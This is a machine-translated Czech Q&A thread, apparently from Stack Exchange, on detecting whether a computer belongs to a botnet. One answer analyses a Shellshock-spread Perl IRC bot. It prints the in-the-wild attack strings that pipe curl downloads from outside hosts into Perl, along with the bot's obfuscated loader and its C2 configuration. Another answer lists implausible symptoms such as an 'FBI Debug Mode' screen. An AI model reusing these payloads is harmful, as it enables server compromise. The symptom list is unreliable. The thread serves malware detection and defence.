it-swarm-eu.dev

Jak zjistím, zda se můj počítač používá k útoku DDoS založeném na botnetu?

botnet je sbírka ohrožených počítačů, z nichž každý je známý jako 'bot', připojený k internetu. Když je počítač napaden útočníkem, v malwaru je často kód, který mu dává příkaz stát se součástí botnetu. „Botmaster“ nebo „bot herder“ řídí tyto kompromitované počítače pomocí standardních síťových protokolů, jako jsou IRC a http.

Existuje způsob, jak zjistit, že váš počítač je používán při útoku DDoS založeném na botnetu?

Existuje nějaký nástroj, jako je software, který dokáže detekovat podivný provoz a zneužít aktivitu z mého počítače?

22
Diogo

Neexistuje snadný způsob, jak zjistit, zda je váš počítač součástí botnetu. Místo toho je nejlepší obranou prevence: v první řadě se vyhněte nakažení.

O tom, jak se vyvarovat narušení bezpečnosti, je napsáno mnoho a spousta věcí. Pro začátek byste si mohli přečíst např. bezpečnostní průvodce pro netechnické uživatele , Windows hardening , Hardening Linux Server , nebo - Secure Linux Desktop . Šťastné čtení!

16
D.W.

Analýza jader a spustitelných souborů před jejich spuštěním je obvykle bezpečná praxe, ale je nejlepší ji kombinovat se silným modelem řízení přístupu k OS, jako je SELinux.

I když je obtížné lokalizovat zadní strany v samoobslužném nebo samokontrolním kódu, obvykle je samoobslužný nebo samokontrolní kód indikátorem malwaru. Například nástroj MANDIANT Red Curtain může pomoci analytikovi malwaru při detekci vysoké entropie v částech kódu nebo podivných jmen/vzorů v těchto sekcích.

Kromě toho existuje mnoho dalších postupů (a ne všechny jsou zdokumentovány), jako je trasování, emulace a kol. Kombinace všech těchto metod do jednoho nástroje nebo techniky není běžná, protože analytici malwaru často přecházejí ze statické na dynamickou analýzu a zpět velmi rychle (aby získali perspektivu). Postupný přístup využívající minimální sadu nástrojů však může hodně dosáhnout ve velmi krátkém čase. Například často používám pescanner.py na spustitelném PE, než ho spustím v karanténě spolu s vyklápěči procesní paměti PE a instrumentací pro sledování, jako je PIN .

Některé z nedávné literatury byly v této oblasti výzkumu stále dobré.

10
atdre

Nejprve nemůžete důvěřovat kompromitovanému počítači, protože výstup všech nástrojů by mohl být podvodný, aby skryl přítomnost škodlivých aktivit.

Obecně bych neočekával, že jakýkoli počítač s robustními bezpečnostními postupy bude součástí botové sítě. Jeden, kde instalujete pouze kód z důvěryhodných zdrojů, máte silná hesla (která se nepoužívají jinde) atd. Pokud můj poskytovatel neřekne, že z mé adresy IP obdržel hlášení o neobvyklé aktivitě, která naznačuje potenciální robot, nebo mi uživatel řekne byli podvedeni v instalaci softwaru, který nedělal to, co bylo inzerováno, a nyní si uvědomují, že to byl pravděpodobně trojan.

V těchto případech bych začal testovat známky potenciálního robota:

  • monitorovat síťovou aktivitu. Spustit netstat - mají všechna připojení více či méně smysl? (ignorujte místní připojení; spusťte whois na zahraničních IP, které nerozpoznávám). Pamatujte si, že výstup netstat mohl být falešný, takže v mé místní síti také spustíte wireshark (síťový analyzátor) z jiného počítače (předpokládaný bezpečný) a zkontrolujte, zda nedochází k neobvyklému provozu do/z podivné ne-lokální IP adresy (to nejsou rutinní věci z mého routeru/síťové tiskárny atd.)?

  • Spusťte do live CD stejné distribuce (takže důvěřujete obslužným programům) a spusťte kontrolní součty (md5) na důležitých obslužných programech (/bin, /sbin/, /usr/bin/, atd.) a porovnejte se známými kontrolními součty bezpečného počítače se stejnou verzí OS/verze (nebo proveďte novou instalaci a spusťte všechny aktualizace a poté vygenerujte kontrolní součty k porovnání s). (Pokud se kontrolní součty neshodují, mohlo by to být způsobeno aktualizací obslužného programu; zkontrolujte tedy verze a prozkoumejte je dále). Pro tuto odpověď jsem předpokládal linux/unixový systém, ale pravděpodobně byste mohli udělat totéž pro Windows, pokud víte, co zkontrolovat.

Pokud najdete důkazy o robotovi, zálohoval bych svá data (což je spustitelné soubory), vyčistěte pevný disk a znovu nainstalujte operační systém z bezpečného zdroje s různými hesly. Byl bych velmi opatrný při otevírání dokumentů, které by mohly obsahovat makra (např. Doc, pdfs) z kompromitovaného počítače (ujistěte se, že deaktivujete makra v příslušných programech, než se znovu podíváte na tyto soubory, aniž byste byli přihlášeni jako administrátor/root, a instalace antivirového programu).

10
dr jimbob

Skutečně dobrý robot se před jádrem skrývá.

Jediným způsobem, jak to zjistit, by bylo vyčichat provoz mezi strojem a internetem pomocí externího, známého stroje. Ani tehdy by nebylo možné zjistit, zda byl robot v době, kdy jste ho hledali, jen spící.

Další možností je spuštění počítače ze známých dobrých (nejlépe jen pro čtení) médií (např. CD nebo DVD) a provedení forenzní analýzy zařízení k vyhledání stop infekce.

9
Tinned_Tuna

Darknet je také dobrý způsob, jak pomoci odhalit napadené počítače ve vaší síti. Je to v podstatě podsíť ve vaší síti LAN, která by za normálních okolností neměla mít směrovaný provoz, s protokolovacími stroji v této síti, které detekují, které počítače nedodržují vaše běžné nastavení sítě, např. vyhledávání uzlů v síti k infikování.

Protože byste měli vědět, jaké chování je normální a co ne, nakažené počítače, které se pokoušejí infikovat ostatní, se vytrhnou jako bolavý palec.

9
deed02392

Konkrétní odpověď: DDoS Perl IrcBot v1.0/2012 od DDoS Security Team

Zřeknutí se odpovědnosti

  • To bylo provedeno kolem této konkrétní verze tohoto malwaru (nazýváno později nástroj ) ... Toto není obecná metoda!

  • Hra s malwarem a viry by mohla být škodlivá! Používejte vyhrazený hardware, uživatel, který není připojen k internetu!

Byli jste varováni!

Úvod

Tuto odpověď zveřejním jako praktický případ , protože tento nástroj jsem již obešel poprvé v roce 2012 a nedávno, kvůli na chybu Shellshock a využívá ...

Stal jsem se podezřelým mailem obsahujícím stejný řetězec jako: To, References, Cc, From, Subject, Date, Message-ID, Comments, Keywords, Resent-Date and Resent-From:

() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.x.x/ex.txt|Perl;lwp-downloa..

Nejprve mi to připadá vtipné, podívejte se kolem svého poštovního uživatele a serveru, nic zvláštního, ok ...

Abych si byl zcela jistý, pokusil jsem se malware stáhnout, bohužel byl vyřazen ze serveru.

... O několik dní později jsem to viděl v jednom webovém protokolu:

... [27/Oct/2014:05:40:56 +0100] "GET /admin.cgi HTTP/1.0"  403 2132 \
        "() { :; }; curl http://202.143.x.x/lib21/index.cgi | Perl" \

Kde pole referer a user-agent obsahují stejný řetězec. Ale s jinou URL.

Deobsuscation

Tentokrát se mi podařilo stáhnout nástroj :

wget http://202.143.x.x/lib21/index.cgi
less index.cgi

#!/usr/bin/Perl
use MIME::Base64;
eval (decode_base64('DQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI...
...IyMjIyMj'));

První krok, aby byly čitelné. Abychom to mohli udělat, musíme nahradit eval za print:

Perl <(sed s/eval/print/ index.cgi) >ircBot.pl

sed -ne '3,11{s/^\(.\{65\}\).*$/\1/;p}' ircBot.pl
#################################################################
##  DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team       ## [
##      Stealth MultiFunctional IrcBot writen in Perl          ##
##        Teste on every system with Perl instlled             ##
##                                                             ##
##     This is a free program used on your own risk.           ##
##        Created for educational purpose only.                ##
## I'm not responsible for the illegal use of this program.    ##
#################################################################

To bylo provedeno pro vzdělávací účel !?

Takže bychom mohli studovat ...

Testování

Mohli byste najít tam deobfuzovaná verze . (Nejsem můj příspěvek, po přečtení jsem zjistil, že mají přesně stejnou konfiguraci tento příspěvek )

Poznámka: Pro běh tohoto druhu nástrojů používám vyhrazený hawdware, není připojen a provozuji vyhrazený virtuální stroj v něm, aby je bylo možné sledovat, sledovat nebo zastavit z horní úrovně.

    31      ##### [ Configuration ] #####
    32      #############################
    33      
    34      my @rps = ("/usr/local/Apache/bin/httpd -DSSL",
    35                         "/usr/sbin/httpd -k start -DSSL",
    36                 "/usr/sbin/httpd",
    37                         "/usr/sbin/sshd -i",
...
    43                         "/usr/sbin/acpid",
    44                         "/usr/sbin/cron");
    45      my $process = $rps[Rand scalar @rps];
    46      
    47      my $vers = "\001VERSION - unknown command.\001";
    48      my $ircname = "shock";
    49      my $realname = `uname -vr`;
    50      my $nick = "Perl";
    51      
    52      $server = 'fflyy.su' unless $server;
    53      my $port = '8080';
    54      
    55      my $linas_max='10';
    56      my $sleep='5';
    57      
    58      my $homedir = "/tmp";
    59      my $version = 'DDoS Perl Bot v1.0';
    60      
    61      my @admins = ("M","st0n3d","x00","Jorgee");
    62      my @hostauth = ("lolhome");
    63      my @channels = ("#mperl2");
    64      $unamea = `uname -a`;
    65      $uid = `id`;
    66      
    67      my $pacotes = 1;
    68      
    69      #################################################################
    70      ##### [ Stop Editing if you dont know what are you doing. ] #####

Na řádcích 31 až 70 najdete konfiguraci:

Už jsme mohli pozorovat, že $process je náhodně definováno z řady řetězců na řádku 45.

Po změně $server, $port, $admins, @hostauth and @channels, Spustím nástroj.

Laboratoře

  • První věc, která se dá říct: tento nástroj zahřívá hodně CPU. Na velkém systému by to mohlo být neškodné, ale na mé špatné konfiguraci to bylo důležité.

  • Bot je připojen na můj irc. Mohl bych ho požádat, aby byl uveden v záhlaví skriptu, a pokud pošlu /msg, otevírají soukromou chatovací místnost, kterou mohu použít jako konzolu Shell Shell .

  • Na straně serveru, jakmile běží, zmizí. Pokud spustím ps ax, Vidím proces httpd, který tam předtím nebyl, ale ...

Teď už dost. Existuje několik příkazů, které jsem spustil, aby jsem zřetelně ukázal, kde je (samozřejmě, všechny tyto příkazy mají být spuštěny jako root nebo přes Sudo):

  • Hledání spuštěného spustitelného souboru Perl:

    ls -l /proc/*/exe | grep Perl
    lrwxrwxrwx 1 www-data www-data 0 oct 30 09:39 /proc/23664/exe -> /usr/bin/Perl
    

    Tím se zobrazí všechny procesy používající Perl jako spustitelný soubor. Toto není založeno na cmdline.

  • Hledáme připojení TCP):

    netstat -tanp | grep :8080
    tcp     0   0 192.168.4.3:33083   192.168.4.1:8080   ESTABLISHED 23664/httpd -DSSL
    

    V této konkrétní konfiguraci (generování malwaru) port 8080 se používá jako vzdálený port . I když vlastníte běžný server, používáte port 8080, tento port se používá jako místní port .

  • Hledáte uživatele webového serveru, který není držen procesem webového serveru

    ps --user www-data ho ppid,pid,cmd | sed -ne 's/^ *1 //p'
    23664 /usr/local/Apache/bin/httpd -DSSL
    
  • Hledání procesu, který jedí CPU:

    top
    top - 09:48:00 up 58 days, 21:51,  1 user,  load average: 0.02, 0.03, 0.00
    Tasks:  15 total,   3 running,  12 sleeping,   0 stopped,   0 zombie
    %Cpu(s):  0.7 us,  0.3 sy,  0.0 ni, 98.9 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
    KiB Mem:    262144 total,    88164 used,   173980 free,        0 buffers
    KiB Swap:        0 total,        0 used,        0 free,        0 cached
    
      PID USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
    23664 www-data  20   0  7408 2956 1204 R  91.7  1.1   8:30.73 /usr/local/apac
        1 root      20   0  2152  724  620 S   0.0  0.3   0:36.47 init
     1028 root      20   0  2248  776  568 S   0.0  0.3   0:03.76 rpcbind
     1039 statd     20   0  2324 1072  820 S   0.0  0.4   0:00.00 rpc.statd
    

Zabíjet je.

Teď je čas to zastavit:

kill -9 23664

Pro další použití, zatímco tento nástroj zůstane nezměněn, jsem rychle napsal perlircbotKiller.pl (které lze spouštět s alespoň stejnými právy jako samotný robot ... nebo root, hádej!)

#!/usr/bin/Perl

my @rps=("/usr/local/Apache/bin/httpd -DSSL", "/usr/sbin/httpd -k start -DSSL",
   "/usr/sbin/httpd", "/usr/sbin/sshd -i","/usr/sbin/sshd","/usr/sbin/sshd -D",
   "/usr/sbin/Apache2 -k start", "/sbin/syslogd", "/sbin/klogd -c 1 -x -x",
   "/usr/sbin/acpid", "/usr/sbin/cron");

opendir my $dh,"/proc";
map {
    open my $fh,"/proc/".$_."/cmdline";
    my $cmdline=<$fh>;
    close $fh;
    $cmdline=~s/\0*$//g;
    if (grep { $cmdline eq $_ } @rps) {
    printf "Sending SIGKILL to process %d\n", $_;
        kill 9, $_;
    }; }
grep { readlink("/proc/".$_."/exe") =~ m|/Perl| }
grep { /^\d+$/ }
readdir $dh;

... A můj fanoušek se pomalu blíží ...

Vyhrazený nástroj

Po nějaké přepsání jsem napsal trochu skript Perl věnovaný

  • hledejte zamlžený skript Perl , python nebo php , který skrývá své jméno pomocí Apache , acpi , httpd , sshd , atd ...

  • hledejte proces, ve kterém je rodičovský pid 1.

  • seznam otevřených připojení

  • nabízejí jednoduchý způsob, jak zabít podezřelý proces .

    Suspicious process      '5089',
        has parent pid: '1',
        run             '/usr/bin/Perl',
        claim to be     '/sbin/syslogd'
        and has port    tcp '8080'
        open to         '93.174.93.80'
    Send SIGKILL to 5089 (Y/n)? Y
    

To funguje dobře s mnoha odvozeními aktuálně vytvořeného malwaru, ale doufám, že by to mohlo fungovat s jinými malwary stejnými metodami.

Závěr.

  • Tento tool (Perl irc bot) není úplně neviditelný, ale jakmile je spuštěn, nabízí vše, co může infikovaný uživatel udělat. (S právy uživatele).

  • Tato verze útoku Shellshock neuloží malware na infikovaný systém, takže k jejich odstranění může stačit jednoduchý restart .

  • Starat se o další nástroje, které může útočník použít, jakmile bude tento nástroj spuštěn! Obzvláště: cron a at, ale jakýkoli skript nebo binární uživatel by mohl spustit a modifikovat, může být infikován!

  • Péče o další místní bezpečnostní problémy , které by mohly povolit zvýšení místních oprávnění !!

1
F. Hauri

1) Vaše baterie se vybije během doby, kdy se vypne.

2) Poté zjistíte, že se váš počítač nebo notebook nikdy nevypne, pokud není vyjmuta baterie nebo napájecí kabel.

3) Váš bezdrátový adaptér je deaktivován, ale všimnete si, že musí existovat dálkové bezdrátové připojení. (z různých důvodů zde neuvádím)

4) Neznámý uživatel je vlastníkem vás C: jednotka a další.

5) Ztratili jste přístupová oprávnění k souborům v systémech32 a programových souborech (x86), jako jsou Cyberlink, Bluetooth, Microsoft Shell ... atd.

6) Vaše body obnovení zmizely.

7) Skartovač souborů v McAfee nebo Avast najednou skartovat, nebo jen vypadat.

8) Změny Firewallu, které jste neprovedli.

9) Během obnovy systému mimo oddíl Windows si na obrazovce všimnete blikání políčka, které říká FBI Debug Mode

10) Pokud 9), pak „systém byl rozdrcen“.

1
MaxImpact

U může použít síťový analyzátor. zkontrolujte odchozí provoz. Většina útoků zírala pod protokolem http/tcp/udp s obrovskou velikostí paketu/rychlým intervalem.

Pokud se váš počítač připojuje často k neotevřenému serveru/ip a pravidelně ho připojuje/připojuje. Můžete si být jisti, že jste ovládáni serverem C & C od B Master.

1
Hidden

Od společnosti TrendMicro je k dispozici nástroj ke kontrole infekce Bot.

http://free.antivirus.com/us/rubotted/

1
tekybala

Chcete-li zkontrolovat, zda váš počítač nebo síť je bot, zkuste kaspersky službu https://blog.kaspersky.com/simda-botnet-check/8304/ nebo RUBotted ( http: //free.antivirus.com/us/rubotted/ ) od Trend Micro. tvrdí, že monitoruje počítač kvůli možné infekci a podezřelým činnostem spojeným s roboty.

1
Badr Bellaj